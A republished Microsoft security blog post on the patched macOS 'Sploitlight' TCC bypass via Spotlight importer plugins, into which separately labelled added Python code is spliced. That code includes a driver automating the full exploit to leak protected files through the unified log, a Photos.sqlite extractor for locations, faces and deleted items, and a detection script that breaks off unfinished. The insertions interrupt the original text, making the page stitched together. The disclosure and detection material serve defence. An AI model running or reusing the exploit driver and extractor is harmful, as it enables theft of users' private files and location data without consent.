{"id":59104,"date":"2025-07-28T16:00:00","date_gmt":"2025-07-28T16:00:00","guid":{"rendered":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/?p=141286"},"modified":"2025-07-28T16:00:00","modified_gmt":"2025-07-28T16:00:00","slug":"sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/","title":{"rendered":"Sploitlight: Analyzing a Spotlight-based macOS TCC vulnerability"},"content":{"rendered":"<p class=\"wp-block-paragraph\">Microsoft Threat Intelligence has discovered a macOS vulnerability that could allow attackers to steal private data of files normally protected by Transparency, Consent, and Control (TCC), such as files in the <em>Downloads<\/em> folder, as well as caches utilized by Apple Intelligence. While similar to prior TCC bypasses like <a href=\"https:\/\/www.microsoft.com\/security\/blog\/2024\/10\/17\/new-macos-vulnerability-hm-surf-could-lead-to-unauthorized-data-access\/\">HM-Surf<\/a> and <a href=\"https:\/\/www.microsoft.com\/security\/blog\/2022\/01\/10\/new-macos-vulnerability-powerdir-could-lead-to-unauthorized-user-data-access\/\">powerdir<\/a>, the implications of this vulnerability, which we refer to as \u201cSploitlight\u201d for its use of Spotlight plugins, are more severe due to its ability to extract and leak sensitive information cached by Apple Intelligence, such as precise geolocation data, photo and video metadata, face and person recognition data, search history and user preferences, and more. 
These risks are compounded by iCloud synchronization between devices on the same account: an attacker with access to a user\u2019s macOS device could also use the vulnerability to learn about other devices linked to that iCloud account.<\/p>\n<p class=\"wp-block-paragraph\">After discovering the bypass technique during proactive hunting for processes with privileged entitlements, we shared our findings with Apple through <a href=\"https:\/\/www.microsoft.com\/msrc\/cvd\">Coordinated Vulnerability Disclosure (CVD)<\/a> via <a href=\"https:\/\/www.microsoft.com\/msrc\/msvr\">Microsoft Security Vulnerability Research (MSVR)<\/a>. Apple released a fix for this vulnerability, now tracked as CVE-2025-31199, as part of the <a href=\"https:\/\/support.apple.com\/en-us\/122373\" target=\"_blank\" rel=\"noreferrer noopener\">security updates<\/a> for macOS Sequoia released on March 31, 2025. We thank the Apple security team for their collaboration in addressing this vulnerability and encourage macOS users to apply these security updates as soon as possible.<\/p>\n<p class=\"wp-block-paragraph\">As a reminder, TCC is the macOS mechanism that prevents applications from accessing users\u2019 personal information, including location services, the camera and microphone, and directories such as <em>Downloads<\/em>, without the user\u2019s prior knowledge and consent. The only legitimate way for an application to gain such access is user approval, either through a prompt in the user interface or by granting the app access in the operating system\u2019s settings.<\/p>\n<p class=\"wp-block-paragraph\">In this blog post, we show how Spotlight plugins, despite the heavy sandbox restrictions that accompany their privileged access to sensitive files, can still be abused to exfiltrate file contents. 
Our research shows how this privileged access, combined with the ability to replace the plugins, blurs the line between operating system components, such as the <em>mds<\/em> daemon and the <em>mdworker<\/em> task, and non-OS components, such as the plugins themselves. We also show how the TCC bypass works against well-defined file types, and how it can be used to obtain valuable data such as information tagged by Apple Intelligence and information about other devices linked to the same iCloud account.<\/p>\n<h2 class=\"wp-block-heading\" id=\"background-spotlight-importers\">Background: Spotlight importers<\/h2>\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/support.apple.com\/guide\/mac-help\/search-with-spotlight-mchlp1008\/mac\" target=\"_blank\" rel=\"noreferrer noopener\">Spotlight<\/a> is the built-in macOS search feature; it finds content on a device quickly because it queries a prebuilt index rather than walking the file system. Users trigger a search with the <em>Command<\/em>+<em>Space<\/em> shortcut. Spotlight also supports plugins, known as Spotlight importers, that index additional data formats; for example, Outlook ships an importer so that emails appear in search results. 
Those plugins are macOS <a href=\"https:\/\/developer.apple.com\/library\/archive\/documentation\/CoreFoundation\/Conceptual\/CFBundles\/AboutBundles\/AboutBundles.html\" target=\"_blank\" rel=\"noreferrer noopener\">bundles<\/a> ending with a <em>.mdimporter<\/em> suffix, and can be listed by using the <a href=\"https:\/\/ss64.com\/mac\/mdimport.html\" target=\"_blank\" rel=\"noreferrer noopener\">mdimport<\/a> utility with the <em>-L<\/em> command line flag:<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-8.webp\" alt=\"Screenshot of code depicting a list of Spotlight plugins on a typical system\" class=\"wp-image-141288 webp-format\" srcset data-orig-src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-8.webp\"><figcaption class=\"wp-element-caption\"><em>Figure 1. A list of Spotlight plugins on a typical system<\/em><\/figcaption><\/figure>\n<p class=\"wp-block-paragraph\">To support that architecture, the technology works in a producer-consumer design, where tools such as Spotlight (or the <a href=\"https:\/\/ss64.com\/mac\/mdfind.html\" target=\"_blank\" rel=\"noreferrer noopener\"><em>mdfind<\/em><\/a> command utility) consume data from index files that are saved locally, and an indexing service produces and updates those index files.<\/p>\n<p class=\"wp-block-paragraph\">The indexing service is known as <em>mds<\/em> and acts as a system daemon. 
When files change, the kernel notifies the <em>mds<\/em> daemon, which in turn spawns a heavily sandboxed task called <em>mdworker<\/em>; <em>mdworker<\/em> runs the plugin logic and updates the index.<\/p>\n<p class=\"wp-block-paragraph\">Spotlight plugins have been studied by other researchers in the past.<\/p>\n<p class=\"wp-block-paragraph\">A Spotlight plugin declares which file types it can process in its <em>Info.plist<\/em> file. When the <em>mds<\/em> daemon decides that such a file needs indexing, an <em>mdworker<\/em> task loads the plugin and invokes its <a href=\"https:\/\/developer.apple.com\/library\/archive\/documentation\/Carbon\/Conceptual\/MDImporters\/Concepts\/WritingAnImp.html\" target=\"_blank\" rel=\"noreferrer noopener\"><em>GetMetadataForFile<\/em><\/a> function with the path of the file.<\/p>\n<h2 class=\"wp-block-heading\" id=\"turning-a-plugin-into-a-tcc-bypass\">Turning a plugin into a TCC bypass<\/h2>\n<p class=\"wp-block-paragraph\">We have covered several TCC bypasses in the past, such as <a href=\"https:\/\/www.microsoft.com\/security\/blog\/2022\/01\/10\/new-macos-vulnerability-powerdir-could-lead-to-unauthorized-user-data-access\/\">CVE-2021-30970<\/a> (\u201cpowerdir\u201d) and <a href=\"https:\/\/www.microsoft.com\/security\/blog\/2024\/10\/17\/new-macos-vulnerability-hm-surf-could-lead-to-unauthorized-data-access\/\">CVE-2024-44133<\/a> (\u201cHM-Surf\u201d). TCC, as described above, prevents apps from accessing users\u2019 personal information, including location services, the camera and microphone, the <em>Downloads<\/em> directory, and more, without prior user consent. 
In this blog post, we focus on access to private files protected by TCC, such as the <em>Downloads<\/em> directory, the <em>Pictures<\/em> directory, and the user\u2019s <em>Desktop<\/em>.<\/p>\n<p class=\"wp-block-paragraph\">Because Spotlight plugins need privileged access to sensitive files in order to index them, Apple confines them heavily with the <a href=\"https:\/\/developer.apple.com\/documentation\/xcode\/configuring-the-macos-app-sandbox\" target=\"_blank\" rel=\"noreferrer noopener\">Sandbox<\/a>. On modern macOS systems, a Spotlight plugin is not even permitted to read or write any file other than the one being scanned. That restriction is insufficient, however: the plugin still holds the file\u2019s bytes, and it has several channels through which it can leak them. In our exploit, we simply write the file\u2019s bytes to the unified log in chunks:<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-12.webp\" alt=\"Screenshot of code depicting the scanned file's contents being leaked via logging\" class=\"wp-image-141296 webp-format\" srcset data-orig-src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-12.webp\"><figcaption class=\"wp-element-caption\"><em>Figure 2. 
Leaking the scanned file\u2019s contents via logging<\/em><\/figcaption><\/figure>\n<p class=\"wp-block-paragraph\">An attacker who knows which file types they want to read can perform the following steps:<\/p>\n<ol start=\"1\" class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">Edit the bundle\u2019s <em>Info.plist<\/em> and <em>schema.xml<\/em> files to declare the file types to leak, expressed as <a href=\"https:\/\/developer.apple.com\/library\/archive\/documentation\/FileManagement\/Conceptual\/understanding_utis\/understand_utis_intro\/understand_utis_intro.html\" target=\"_blank\" rel=\"noreferrer noopener\">UTIs<\/a>. Because the attacker already runs code locally, the UTI can always be resolved, even for dynamic types.<\/li>\n<li class=\"wp-block-list-item\">Copy the bundle into the <em>~\/Library\/Spotlight<\/em> directory. The bundle does not need to be signed at all.<\/li>\n<li class=\"wp-block-list-item\">Force Spotlight to load the new bundle with <em>mdimport -r<\/em>, and verify that it is loaded with <em>mdimport -L<\/em>.<\/li>\n<li class=\"wp-block-list-item\">Run <em>mdimport -i &lt;path&gt;<\/em> to recursively index the files under the given path, which causes the plugin to leak them. The calling app needs no TCC permission for the indexed directory, because the file reads are performed by the <em>mdworker<\/em> task.<\/li>\n<li class=\"wp-block-list-item\">Read the leaked file contents back with the <em>log<\/em> utility.<\/li>\n<\/ol>\n<p class=\"wp-block-paragraph\">The UTI of a file with a dynamic type can be determined with the <a href=\"https:\/\/manp.gs\/mac\/1\/uttype\" target=\"_blank\" rel=\"noreferrer noopener\">uttype<\/a> utility, even if the calling app has no TCC access to the directory that contains it. 
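<\/p>\n<p class=\"wp-block-paragraph\">The five steps above, automated in Python as an added example that is not part of the original post and is not Microsoft\u2019s Sploitlight POC. It assumes several things the page does not specify: an existing unsigned <em>.mdimporter<\/em> bundle; a plugin build that writes each scanned file to the unified log in chunks using the hypothetical message format <em>SPL {id} {i}\/{n} {hex}<\/em> under the made-up os_log subsystem <em>com.example.sploitlight<\/em>; and the <em>CFBundleTypeRole<\/em> and <em>LSItemContentTypes<\/em> keys from Apple\u2019s importer template for the <em>Info.plist<\/em> edit. The <em>schema.xml<\/em> edit from step 1 is not automated. The plist rewrite and the log reassembly run anywhere; only the <em>mdimport<\/em> and <em>log<\/em> calls in main() need macOS.<\/p>

```python
# Added example, not Microsoft's Sploitlight POC: drives the five steps
# above on macOS. Assumed: an existing unsigned importer bundle whose
# plugin code logs each scanned file in chunks with the hypothetical
# message format 'SPL {id} {i}/{n} {hex}' (id = space-free file label,
# i = zero-based chunk index, n = chunk count) under the made-up os_log
# subsystem 'com.example.sploitlight'. Only main() touches mdimport/log.
import plistlib
import shutil
import subprocess
import sys
from pathlib import Path

SUBSYSTEM = 'com.example.sploitlight'                    # assumed: subsystem the plugin logs under
SPOTLIGHT_DIR = Path.home() / 'Library' / 'Spotlight'   # per-user importer directory (step 2)


def sample_info_plist():
    '''Constructed minimal importer Info.plist, a stand-in for a real bundle.'''
    return plistlib.dumps({
        'CFBundleIdentifier': 'com.example.importer',
        'CFBundleDocumentTypes': [{'CFBundleTypeRole': 'MDImporter',
                                   'LSItemContentTypes': ['public.plain-text']}],
    })


def claimed_utis(info_plist):
    '''UTIs an importer currently claims (also handy for auditing installed bundles).'''
    plist = plistlib.loads(info_plist)
    return [u for t in plist.get('CFBundleDocumentTypes', [])
            for u in t.get('LSItemContentTypes', [])]


def claim_utis(info_plist, utis):
    '''Step 1: rewrite CFBundleDocumentTypes so mdworker hands the importer every
    file whose type matches one of the given UTIs (static or dyn.* types).'''
    plist = plistlib.loads(info_plist)
    plist['CFBundleDocumentTypes'] = [{'CFBundleTypeRole': 'MDImporter',
                                       'LSItemContentTypes': list(utis)}]
    return plistlib.dumps(plist)


def install(bundle_src):
    '''Steps 2-3: copy the bundle into ~/Library/Spotlight, ask mds to reload
    it (mdimport -r) and confirm it is listed (mdimport -L).'''
    dst = SPOTLIGHT_DIR / bundle_src.name
    SPOTLIGHT_DIR.mkdir(parents=True, exist_ok=True)
    shutil.copytree(bundle_src, dst, dirs_exist_ok=True)
    subprocess.run(['mdimport', '-r', str(dst)], check=True)
    listing = subprocess.run(['mdimport', '-L'], capture_output=True, text=True)
    if str(dst) not in listing.stdout + listing.stderr:
        raise RuntimeError('importer was not loaded: ' + str(dst))
    return dst


def index_tree(target):
    '''Step 4: mdworker, not the caller, opens the files, so no TCC prompt appears.'''
    subprocess.run(['mdimport', '-i', str(target)], check=True)


def read_log(last='5m'):
    '''Step 5: fetch the plugin log lines from the unified log.'''
    quote = chr(34)   # the predicate needs double quotes around the subsystem name
    predicate = 'subsystem == ' + quote + SUBSYSTEM + quote
    out = subprocess.run(['log', 'show', '--last', last, '--style', 'compact',
                          '--predicate', predicate],
                         capture_output=True, text=True, check=True)
    return out.stdout.splitlines()


def reassemble(lines):
    '''Rebuild leaked files from the chunk messages; returns {id: bytes}.
    Files with missing chunks are dropped rather than returned truncated.'''
    chunks, totals = {}, {}
    for line in lines:
        pos = line.find('SPL ')
        if pos == -1:
            continue
        parts = line[pos:].split()
        if len(parts) != 4:
            continue
        _, file_id, seq, hexdata = parts
        i, n = (int(x) for x in seq.split('/'))
        totals[file_id] = n
        chunks.setdefault(file_id, {})[i] = bytes.fromhex(hexdata)
    files = {}
    for file_id, n in totals.items():
        got = chunks[file_id]
        if all(i in got for i in range(n)):
            files[file_id] = b''.join(got[i] for i in range(n))
    return files


if __name__ == '__main__':
    # usage: python3 sploitlight_driver.py Evil.mdimporter ~/Pictures public.data
    if sys.platform != 'darwin':
        sys.exit('the mdimport/log steps only run on macOS')
    bundle, target, utis = Path(sys.argv[1]), Path(sys.argv[2]), sys.argv[3:]
    info = bundle / 'Contents' / 'Info.plist'
    info.write_bytes(claim_utis(info.read_bytes(), utis))
    install(bundle)
    index_tree(target)
    for file_id, data in reassemble(read_log()).items():
        print(file_id, len(data), 'bytes recovered')
```

<p class=\"wp-block-paragraph\">Run it as <em>python3 sploitlight_driver.py Evil.mdimporter ~\/Pictures public.data<\/em> (the script name is ours). The UTI list is the only part that has to be tailored to the target; for a file whose type is not registered with the system, the dynamic UTI has to be resolved first with the <em>uttype<\/em> utility. <\/p>\n<p class=\"wp-block-paragraph\">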
For example, here is the resolution of the TCC-protected <em>Photos.sqlite<\/em> file:<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-11.webp\" alt=\"Screenshot of code depicting the resolution of a dynamic type despite lack of TCC permissions\" class=\"wp-image-141295 webp-format\" srcset data-orig-src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-11.webp\"><figcaption class=\"wp-element-caption\"><em>Figure 3. Resolution of a dynamic type despite the lack of TCC permissions<\/em><\/figcaption><\/figure>\n<p class=\"wp-block-paragraph\">Because the <em>.mdimporter<\/em> bundle need not be signed, retargeting it to other file types requires no recompilation: the attacker just edits <em>Info.plist<\/em> and <em>schema.xml<\/em>. We therefore conclude that an attacker can trivially discover and read arbitrary files from sensitive directories normally protected by TCC. Our initial exploit targeted the <em>Downloads<\/em> folder; the <em>Pictures<\/em> folder later turned out to be the more interesting target.<\/p>\n<p class=\"wp-block-paragraph\">We wrote a full proof-of-concept (POC) exploit, dubbed \u201cSploitlight\u201d, that automates the entire process, and shared it with Apple:<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-9.webp\" alt=\"Screenshot of the Sploitlight POC exploit discovering and leaking files from Photos even though the Terminal does not have access\" class=\"wp-image-141293 webp-format\" srcset data-orig-src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-9.webp\"><figcaption class=\"wp-element-caption\"><em>Figure 4. 
Exploitation: the Terminal has no access to Photos, yet files are still discovered and leaked<\/em><\/figcaption><\/figure>\n<h2 class=\"wp-block-heading\" id=\"exposing-more-sensitive-data-from-apple-intelligence\">Exposing more sensitive data from Apple Intelligence<\/h2>\n<p class=\"wp-block-paragraph\">The ability to read sensitive files is more dangerous than it seems. <a href=\"https:\/\/www.apple.com\/apple-intelligence\/\" target=\"_blank\" rel=\"noreferrer noopener\">Apple Intelligence<\/a>, which is present by default on ARM-based devices, caches its data under various directories. One such directory lives under the user\u2019s <em>Pictures<\/em> directory:<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-7.webp\" alt=\"Screenshot of index files created by Apple Intelligence, including Photos.sqlite and photos.db\" class=\"wp-image-141292 webp-format\" srcset data-orig-src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-7.webp\"><figcaption class=\"wp-element-caption\"><em>Figure 5. Index files created by Apple Intelligence<\/em><\/figcaption><\/figure>\n<p class=\"wp-block-paragraph\">Those files are protected by the \u201cPictures\u201d TCC service type and cannot be read without the user\u2019s approval. 
However, as we demonstrated with the Sploitlight POC, we can leak the contents of arbitrary files, and therefore the contents of those database files.<\/p>\n<p class=\"wp-block-paragraph\">Many forensic utilities exist for extracting private information from <em>Photos.sqlite<\/em> and <em>photos.db<\/em>; the table below summarizes what an attacker can obtain from them:<\/p>\n<figure class=\"wp-block-table\">\n<table class=\"has-fixed-layout\">\n<tbody>\n<tr>\n<td><strong>Type of data<\/strong><\/td>\n<td><strong>Information obtained<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>Precise geolocation data<\/strong><\/td>\n<td>\u2013 GPS coordinates (latitude, longitude, altitude) associated with photos and videos.<br \/>\u2013 Time-stamped location history, from which a user\u2019s movements over time can be reconstructed.<br \/>\u2013 Reverse-geocoded addresses or place names.<\/td>\n<\/tr>\n<tr>\n<td><strong>Photo and video metadata<\/strong><\/td>\n<td>\u2013 Timestamps of when photos and videos were taken.<br \/>\u2013 Device model and camera settings (aperture, ISO, shutter speed).<br \/>\u2013 Media paths pointing to stored content.<\/td>\n<\/tr>\n<tr>\n<td><strong>Face and person recognition data<\/strong><\/td>\n<td>\u2013 Identified faces, linked to contact names where the user has tagged them.<br \/>\u2013 Clustering of photos by recognized individuals.<\/td>\n<\/tr>\n<tr>\n<td><strong>User activity and event context<\/strong><\/td>\n<td>\u2013 Photo-related activities, such as screenshots, saved images, and shared content.<br \/>\u2013 Event clustering (such as vacations and birthdays).<\/td>\n<\/tr>\n<tr>\n<td><strong>Photo albums and shared libraries<\/strong><\/td>\n<td>\u2013 User-defined photo albums and their contents.<br \/>\u2013 Shared album details, including participants.<\/td>\n<\/tr>\n<tr>\n<td><strong>Deleted photos and videos<\/strong><\/td>\n<td>\u2013 Metadata of recently deleted items that may still exist in the <em>Recently Deleted<\/em> section.<\/td>\n<\/tr>\n<tr>\n<td><strong>Image classification and object detection<\/strong><\/td>\n<td>\u2013 Labels and categories generated by the Photos app (such as \u201cbeach,\u201d \u201cdog,\u201d \u201cdocument\u201d).<\/td>\n<\/tr>\n<tr>\n<td><strong>Search history and user preferences<\/strong><\/td>\n<td>\u2013 Previous search queries within the Photos app.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-6.webp\" alt=\"Screenshot of Photos.sqlite metadata\" class=\"wp-image-141289 webp-format\" srcset data-orig-src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-6.webp\"><figcaption class=\"wp-element-caption\"><em>Figure 6. Getting file name, description, title, GPS location, and date from Photos.sqlite metadata<\/em><\/figcaption><\/figure>\n<p class=\"wp-block-paragraph\">Beyond the detailed private information this yields about the targeted device itself, note that Apple devices sharing the same iCloud account keep separate <em>Photos.sqlite<\/em> database files, but face tags and other metadata propagate between devices. 
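<\/p>\n<p class=\"wp-block-paragraph\">As an added example (not code from the post, and not one of the utilities mentioned above), the following Python reads the same fields as Figure 6 (file name, title, description, GPS position, capture date) plus person tags and the recently-deleted flag from a copy of <em>Photos.sqlite<\/em>. Table and column names (<em>ZASSET<\/em>, <em>ZADDITIONALASSETATTRIBUTES<\/em>, <em>ZASSETDESCRIPTION<\/em>, <em>ZDETECTEDFACE<\/em>, <em>ZPERSON<\/em>) are assumed from the publicly documented Photos library schema and differ between OS versions; the -180 sentinel for a missing GPS fix and the Core Data epoch of 2001-01-01 are likewise assumptions to verify against the actual database. The <em>sample_library()<\/em> function builds a small constructed stand-in so the script runs offline.<\/p>

```python
# Added example, not code from the blog: pull the rows Figure 6 reads
# (file name, title, description, GPS position, capture date) plus person
# tags from a Photos.sqlite copy. Table/column names are assumed from the
# publicly documented Photos library schema; check them with .schema on
# the real file, since they change between macOS versions.
import sqlite3
from datetime import datetime, timedelta, timezone

CORE_DATA_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)  # Core Data dates: seconds since 2001-01-01
NO_LOCATION = -180.0   # assumed sentinel Photos writes when an asset has no GPS fix

QUERY = '''
SELECT a.Z_PK, a.ZFILENAME, a.ZLATITUDE, a.ZLONGITUDE, a.ZDATECREATED, a.ZTRASHEDSTATE,
       attr.ZTITLE, d.ZLONGDESCRIPTION
FROM ZASSET a
LEFT JOIN ZADDITIONALASSETATTRIBUTES attr ON attr.Z_PK = a.ZADDITIONALATTRIBUTES
LEFT JOIN ZASSETDESCRIPTION d ON d.ZASSETATTRIBUTES = attr.Z_PK
ORDER BY a.ZDATECREATED
'''
PEOPLE = '''
SELECT f.ZASSET, p.ZFULLNAME FROM ZDETECTEDFACE f JOIN ZPERSON p ON p.Z_PK = f.ZPERSON
'''


def core_data_date(seconds):
    '''Convert a Core Data timestamp to an ISO 8601 UTC string (None stays None).'''
    if seconds is None:
        return None
    return (CORE_DATA_EPOCH + timedelta(seconds=seconds)).isoformat()


def extract(conn):
    '''One dict per asset with the fields an attacker (or examiner) cares about.'''
    people = {}
    for asset, name in conn.execute(PEOPLE):
        if name:
            people.setdefault(asset, []).append(name)
    rows = []
    for pk, fname, lat, lon, created, trashed, title, desc in conn.execute(QUERY):
        has_fix = lat is not None and lat != NO_LOCATION
        rows.append({
            'file': fname, 'title': title, 'description': desc,
            'location': (lat, lon) if has_fix else None,
            'taken': core_data_date(created),
            'recently_deleted': bool(trashed),   # still in Recently Deleted, metadata intact
            'people': sorted(people.get(pk, [])),
        })
    return rows


def open_library(path):
    '''Open a forensic copy read-only so it is never modified.'''
    return sqlite3.connect('file:' + path + '?mode=ro', uri=True)


def sample_library():
    '''Constructed stand-in for a Photos.sqlite with two assets; not real data.'''
    conn = sqlite3.connect(':memory:')
    conn.executescript('''
        CREATE TABLE ZASSET (Z_PK INTEGER PRIMARY KEY, ZFILENAME TEXT, ZLATITUDE REAL,
                             ZLONGITUDE REAL, ZDATECREATED REAL, ZTRASHEDSTATE INTEGER,
                             ZADDITIONALATTRIBUTES INTEGER);
        CREATE TABLE ZADDITIONALASSETATTRIBUTES (Z_PK INTEGER PRIMARY KEY, ZASSET INTEGER, ZTITLE TEXT);
        CREATE TABLE ZASSETDESCRIPTION (Z_PK INTEGER PRIMARY KEY, ZASSETATTRIBUTES INTEGER,
                                        ZLONGDESCRIPTION TEXT);
        CREATE TABLE ZDETECTEDFACE (Z_PK INTEGER PRIMARY KEY, ZASSET INTEGER, ZPERSON INTEGER);
        CREATE TABLE ZPERSON (Z_PK INTEGER PRIMARY KEY, ZFULLNAME TEXT, ZDISPLAYNAME TEXT);
        INSERT INTO ZASSET VALUES (1, 'IMG_0001.HEIC', 47.6062, -122.3321, 765115200.0, 0, 1);
        INSERT INTO ZASSET VALUES (2, 'IMG_0002.HEIC', -180.0, -180.0, 765201600.0, 1, 2);
        INSERT INTO ZADDITIONALASSETATTRIBUTES VALUES (1, 1, 'Office view');
        INSERT INTO ZADDITIONALASSETATTRIBUTES VALUES (2, 2, NULL);
        INSERT INTO ZASSETDESCRIPTION VALUES (1, 1, 'Taken from the 12th floor');
        INSERT INTO ZPERSON VALUES (1, 'Alice Example', 'Alice');
        INSERT INTO ZDETECTEDFACE VALUES (1, 1, 1);
    ''')
    return conn


if __name__ == '__main__':
    for row in extract(sample_library()):
        print(row)
```

<p class=\"wp-block-paragraph\">Against a real copy, call <em>extract(open_library(path))<\/em>. Because face tags and other metadata propagate through iCloud Photos, the rows may describe photos taken on any device on the account, not just on the Mac the file came from. <\/p>\n<p class=\"wp-block-paragraph\">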
This means that an attacker with access to a user\u2019s macOS device can also learn about other devices linked to that user\u2019s iCloud account, such as the user\u2019s iPhone.<\/p>\n<p class=\"wp-block-paragraph\">In addition, threat actors could just as easily obtain private data from other Apple Intelligence cache files, such as <a href=\"https:\/\/github.com\/mac4n6\/Presentations\/blob\/master\/Using%20Apple%20Intelligence%20%5BAI%5D%20Data%20in%20Investigations\/UsingAppleIntelligenceDataInInvestigations.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">email summaries and notes written with ChatGPT<\/a>.<\/p>\n<h2 class=\"wp-block-heading\" id=\"strengthening-protection-against-tcc-bypass-attacks\">Strengthening protection against TCC bypass attacks<\/h2>\n<p class=\"wp-block-paragraph\">Attackers who can bypass TCC protections on macOS devices can access sensitive data without user consent. The ability to exfiltrate private data from protected directories such as the <em>Downloads<\/em> folder and the Apple Intelligence caches is particularly alarming because of the sensitivity of what can be extracted: geolocation data, media metadata, and user activity. The impact is broader still because of iCloud synchronization between devices on the same account, which lets an attacker learn about a user\u2019s other devices from a single compromised Mac. Understanding the implications of TCC bypass vulnerabilities is essential for building proactive defenses that safeguard user data from unauthorized access.<\/p>\n<p class=\"wp-block-paragraph\">By understanding the broader impact of these issues, we can better defend users and ensure their digital safety. 
<a href=\"https:\/\/www.microsoft.com\/security\/business\/endpoint-security\/microsoft-defender-endpoint\">Microsoft Defender for Endpoint<\/a> allows organizations to quickly discover and remediate vulnerabilities such as Sploitlight across their increasingly heterogeneous networks. The insights from this research have let us enhance Microsoft Defender for Endpoint\u2019s detection logic to protect against unauthorized access to private data, by detecting anomalous <em>.mdimporter<\/em> bundle installations together with suspicious indexing of sensitive directories:<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-10.webp\" alt=\"Screenshot of Defender for Endpoint's detection reading Suspicious Spotlight operation\" class=\"wp-image-141294 webp-format\" srcset data-orig-src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-10.webp\"><figcaption class=\"wp-element-caption\"><em>Figure 7. Microsoft Defender for Endpoint detection of unusual Spotlight operations<\/em><\/figcaption><\/figure>\n<p class=\"wp-block-paragraph\">By continuously improving our security solutions, we aim to safeguard user information and uphold the trust placed in our products. This research also underlines the importance of continuous vigilance and of collaboration with software vendors and the security community to identify and mitigate such vulnerabilities before they can be exploited. 
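<\/p>\n<p class=\"wp-block-paragraph\">The two signals named above, an <em>.mdimporter<\/em> bundle appearing in a Spotlight plugin directory and <em>mdimport<\/em> being pointed at a TCC-protected directory, are what the exploit cannot avoid producing. The following Python is an added example of that detection logic, written for this page rather than taken from Defender for Endpoint. It runs over constructed EDR-style records (the field names <em>ts<\/em>, <em>kind<\/em>, <em>process<\/em>, <em>path<\/em> and <em>cmdline<\/em>, the home directory and the installer allow-list are all assumptions) and escalates a protected-directory import that follows an importer drop within 30 minutes.<\/p>

```python
# Added example of the detection idea described above; written for this
# page, not taken from Defender for Endpoint. Input shape is assumed:
# EDR-style records as dicts with 'ts' (ISO 8601), 'kind' ('file' or
# 'process'), 'process' (image name) and either 'path' or 'cmdline'.
from datetime import datetime, timedelta

USER_HOME = '/Users/alice'                        # assumed; take it from the record owner in real telemetry
PLUGIN_DIRS = (USER_HOME + '/Library/Spotlight', '/Library/Spotlight')
PROTECTED_DIRS = tuple(USER_HOME + '/' + d for d in ('Downloads', 'Desktop', 'Documents', 'Pictures'))
TRUSTED_INSTALLERS = {'installer', 'Installer'}   # assumed allow-list for legitimate importer installs
WINDOW = timedelta(minutes=30)                    # how long an importer drop stays 'hot'


def under(path, dirs):
    '''True if path equals one of dirs or lies beneath it (no prefix false positives).'''
    return any(path == d or path.startswith(d + '/') for d in dirs)


def importer_drop(ev):
    '''File event that writes an Info.plist inside a .mdimporter bundle in a
    Spotlight plugin directory, by a process that is not a trusted installer.'''
    if ev['kind'] != 'file':
        return False
    path = ev['path']
    return (under(path, PLUGIN_DIRS) and '.mdimporter/' in path
            and path.endswith('/Info.plist') and ev['process'] not in TRUSTED_INSTALLERS)


def protected_import(ev):
    '''Process event where mdimport -i is pointed at a TCC-protected directory.'''
    if ev['kind'] != 'process' or ev['process'] != 'mdimport':
        return False
    args = ev['cmdline'].split()
    return '-i' in args and any(under(a, PROTECTED_DIRS) for a in args)


def detect(events):
    '''Return alerts in time order. A protected import that follows an importer
    drop within WINDOW is escalated to high severity and linked to that drop.'''
    drops, alerts = [], []
    for ev in sorted(events, key=lambda e: e['ts']):
        if importer_drop(ev):
            drops.append(ev)
            alerts.append({'severity': 'medium', 'rule': 'spotlight-importer-drop',
                           'ts': ev['ts'], 'path': ev['path']})
        elif protected_import(ev):
            now = datetime.fromisoformat(ev['ts'])
            recent = [d for d in drops if now - datetime.fromisoformat(d['ts']) <= WINDOW]
            alerts.append({'severity': 'high' if recent else 'medium',
                           'rule': 'mdimport-protected-dir', 'ts': ev['ts'],
                           'cmdline': ev['cmdline'],
                           'linked_drop': recent[-1]['path'] if recent else None})
    return alerts


SAMPLE_EVENTS = [   # constructed telemetry, not real data
    {'ts': '2025-03-01T10:00:00', 'kind': 'file', 'process': 'cp',
     'path': USER_HOME + '/Library/Spotlight/Evil.mdimporter/Contents/Info.plist'},
    {'ts': '2025-03-01T10:00:05', 'kind': 'process', 'process': 'mdimport',
     'cmdline': 'mdimport -r ' + USER_HOME + '/Library/Spotlight/Evil.mdimporter'},
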